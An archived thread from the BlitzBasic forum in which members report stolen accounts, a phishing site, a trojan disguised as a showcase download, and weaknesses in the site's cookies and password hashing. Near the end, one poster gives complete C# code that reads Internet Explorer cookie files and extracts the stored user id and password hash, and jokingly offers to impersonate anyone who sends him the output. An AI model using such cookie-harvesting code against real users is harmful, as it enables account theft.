My Blitz account was stolen....
Miscellaneous Forums/General Discussion/My Blitz account was stolen....
This is yoko,
Today I visit blitzbasic.com I found can not log into my account anyway, then I found my nick was changed.
see this:(the topic starter)
http://www.blitzbasic.com/Community/posts.php?topic=82267My nick was changed(should be yoko), I'm sure my acount was stolen now.
As i have one spare account when I'm still using Blitz2D, that's the only way I can post here...
I have mailed the contact and support, even Mark's mail, no response yet.
If Mark or admins see this please deal it soon.... please.
Interesting that a site of German origin recently appeared trying to harvest login details from Blitz users - didn't try to log in there, did you? If so, that's how he got your username/password.
Can it be mere coincidence that your account now seems to be taken over by a German with a gmx.de email address??
I've emailed you yoko.
Yes unfortunately there appears to be an unscrupilous individual about at the moment who may have stolen account details from here and is now attempting to sell them on. This individual appears to originate form Germany.
Please be on the look out for anything suspicious and change your password if you have not done so recently. Also, please do not buy Blitz licenses from third parties without informing us about it beforehand.
I've mailed support with my details of purchase.
I didn't go into other sites yet, however I 've encountered someone trying to steal user account with some javascript exploits and I accidently using IE6 during that time.
I hope it can be solved anyway.
BTW, I use different pass on each place, I think it's a Blitz forum specific case as my other accounts on other sites have no trace to be hacked etc.
They're still at it??
Maybe the security of the site needs a bit of a rethink? I'm not clever enough to know what needs doing, only that *something* probably does.
I dunno, but I don't think my original pass can be brute-force guessed easily, it combines chars and numbers based on Japanese katakana...
And I got "Internal Error" when trying to mail the password, just stuck currently...
Maybe the security of the site needs a bit of a rethink? I'm not clever enough to know what needs doing, only that *something* probably does.
If people are going to submit their account details to a site other than the official BB site (including it's various domains) then there isn't much that can be done. This isn't a new problem, and even banks have to report to simply reminding people not to follow links from e-mails asking users to log in.
I'm slightly surprised BB was targetted. Is there really much profit in selling BB accounts?
Still waiting to be solved now, as the mail password function on BB.com doesn't work, I always got "Internal Error" thing.
It's 3AM here and I just hope that can be solved soon.... than a good sleep.
If people are going to submit their account details to a site other than the official BB site (including it's various domains) then there isn't much that can be done.
Certainly, but there are connected issues. For example, where are the email addresses coming from in the first place? Are they being harvested manually? If so, then perhaps the forum should be changed to hide the email address entirely and instead offer an "email a user" button which does not display the email address it goes to. If they're being harvested in bulk, then obviously there's a bigger issue that needs to be fixed.
It could be a crazy, like er, Brice Manuel, but probably not.
Sorry to hijack this Thread,
My Blitz- Account was stolen too,
because i never posted anything in this Board!
One week ago - i looked into my Account and saw, i had two posts (a answer and a particle engine project) - (old Username was MasterKabuto)
i changed immediately the username/password and some details, im not registered anywhere with the same username/password combination...
anyway it happened to me too..
Edit:
After some research, i found out a German- Blitz User with the Name YZnT, had posted the same Project with same DL etc. in the German Blitz- Board, maybe its a hint or something!
German- Blitz Board:
See the second last Post!Project from here: (the particle engine thingy)
Project from here!Edit2:
If support wants prove, that this Acc is my, i can eMail the Details!
I 've encountered someone trying to steal user account with some javascript exploits
On this site?
Interesting that Yoko was the first to post in response to the link/download provided by "RedShark's" alter-ego...
Where's Puki when you need some conspiracy theories?
IS that program has backdoors etc?
I'm afraid it's true, might need a clean install of Windows now...
It could be a crazy, like er, Brice Manuel, but probably not.
Granted Kuron has his moments (Like calling me a violent alcoholic), but I doubt he'd stoop to that.
Dabz
In the last time some blitz boards are really like x-files. Today my account in blitzforum.de has been hijacked. But admins was fast enought to disable my account...strange!
You downloaded and ran the program as well Abrexxes - I'm sorry to say this was obviously a trojan.
Phew, got my account back... thanks simon.
I'll starting to change all my password soon.
This trojan can be detected by BitDefender, it'a dropper'ish trojan, and I don't know what it drops, really consider re-install system.
These kind of folks have way too much time on their hands.
I think "folks" is way too kind. "Bastards" is more like it. BRL are busy enough making Max3D and other stuff and the last thing they need is to spend time or boring crap like website security just because some T**TS mess around with it. This sort of stuff (viruses, spam, 419s scams pisses me off). /END RANT
I appreciate the sentiment but if I were you I'd make a mug of coffee, and edit the swearing out of that.
I've learned through long experience that these individuals aren't worth your time, and certainly aren't worth getting yourself banned for.
T-word droppage. :P
The Java script hack before was sig based. The guy posted a hack in his sig and when anyone went in to the same thread he posted in they would get their password hacked.
I think this only affected IE6.
wow I never knew that was a swearword. Thanks for the education swear filter!
If people are going to submit their account details to a site other than the official BB site (including it's various domains) then there isn't much that can be done.
It doesn't exactly help that this site saves all your account details as cookies. Anything you download from this site, could be used to harvest your user details.
I'm a member of a number of communities and have only experienced problems here with security. I've already been informed to change my password once before now.
I've always trusted downloads in the showcase, not that I look in there very often these days, but I thought programming community members could be trusted and that the last people you'd want to upset are the people you get help from when you need it.
It saddens me that programmers would effectively hack-war on each other. We all already know that there is no defence against clever programming, we're all capable of messing up each others computers via our showcases and examples, and other clever methods. No system can be totally foolproof and the very nature of sharing our work in the showcase makes us inherrently at risk. There has to therefore be a level of trust between us as a community.
When users break this trust the whole community suffers. it's a shame, a real shame, that I find myself loathe to trust downloads by Blitz users as a whole because I dont read here often enough to remember which community members are bad seeds.
I'd rather code than loiter all day on a forum, i'm sure you guys understand that, but I do take part and post when i'm in the mood for it. I'm part of this community, albiet on the fringes, but it bothers me that there are in this community people who would abuse the trust I place in them.
I think the more deviously minded amongst us should consider that just because something is possible does not meen that you should do it. Many of us are capable of wrecking total havok if we chose. We dont do it out of respect for the talents and abilities that are shared between us.
If you have no moral ideal as a programmer then you have no place in a programming community. It really is that simple.
It doesn't exactly help that this site saves all your account details as cookies. Anything you download from this site, could be used to harvest your user details.
Any JavaScript that is downloaded from this site can check your cookies, but users should not be able to post JavaScript here. It would also help a bit if some kind of salt was used in addition to plain MD5.
Oh, and it would be nice if one of BlitzMax.com and BlitzBasic.com would be canonical. This way it just messes up cookies.
I'm not saying it's BRL's fault, but if there is a vulnerability on a site with enough traffic, someone will try to use it eventually.
I use the On-Screen Keyboard when I login. I remember reading somewhere that a Keylogger program cannot record keystrokes from it.
That may be a good idea, but you must still make sure you have no trojans.
Someone with assembly skills should disassemble the trojan in a vm.
For anyone who's interested, here is a naive program which will scan your IE Cookies for your site credentials:
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;
using System.IO;
namespace BlitzHack
{
class Program
{
static void Main(string[] args)
{
List<string> harvestedCookies = new List<string>();
string userlocation = Environment.GetEnvironmentVariable(@"UserProfile");
string ieCookies = userlocation + @"\Cookies";
Console.Out.WriteLine(string.Format(@"Scanning {0} for useful cookies... ", ieCookies ));
Regex blitzMatch = new Regex(@"blitz");
Regex idMatch = new Regex(@"_i\n(\d+)\n");
Regex passHashMatch = new Regex(@"_p\n([\w\d]{32})\n");
foreach (string s in Directory.GetFiles(ieCookies))
{
if (blitzMatch.Match(s).Success)
{
harvestedCookies.Add(s);
Console.Out.WriteLine(string.Format(@"Located {0}... ", s ));
}
}
foreach (string s in harvestedCookies)
{
FileStream fs = new FileStream(s, FileMode.Open, FileAccess.Read);
StreamReader sr = new StreamReader(fs);
string content = sr.ReadToEnd();
Match id = idMatch.Match(content);
Match pass = passHashMatch.Match(content);
if (id.Success && pass.Success)
{
Console.Out.WriteLine(string.Format(@"Found user id {0} and password hash {1}...", id.Groups[1], pass.Groups[1]));
}
sr.Close();
fs.Close();
}
Console.Out.WriteLine(@"Bye... ");
}
}
}You can copy/paste it right into Visual Studio if you want (and as you can see, it doesn't report anything back to me, so it's for your own use only). It's fairly inelegant and unoptimized, but it works as a proof of concept, and if anyone is felling particularly adventurous, they can email me their output and I'll post something silly in this thread in their name. Getting FireFox and Opera cookies is not particularly more troublesome, but I didn't really want to bother, just to prove my point.
Someone with assembly skills should disassemble the trojan in a vm.
Anyone with those skills would have much, much better things to do in their spare time.
As one of the victims of downloading the particle thing, running it and providing feedback (prior to knowing it was actually a password harvester), and then only happening across the fact it was a harvester by having a peek at the trojan sticky thread - I'd just like to thank those for bringing it to my attention. I suspect I've been nieve until now a word of caution - watch what you try out for people, some are less than moral.
a little googling reveals this thread,
http://forums.wow-europe.com/thread.html;jsessionid=C435FF6A3C26616736C17A70A2681FB0.app09_03?topicId=4095541555&postId=40946539970&sid=1
which also harvests stuff to send to:
IP Address: 217.72.192.157&submit=+Resolve+IP+Address+
Hostname: smtp-ha.web.de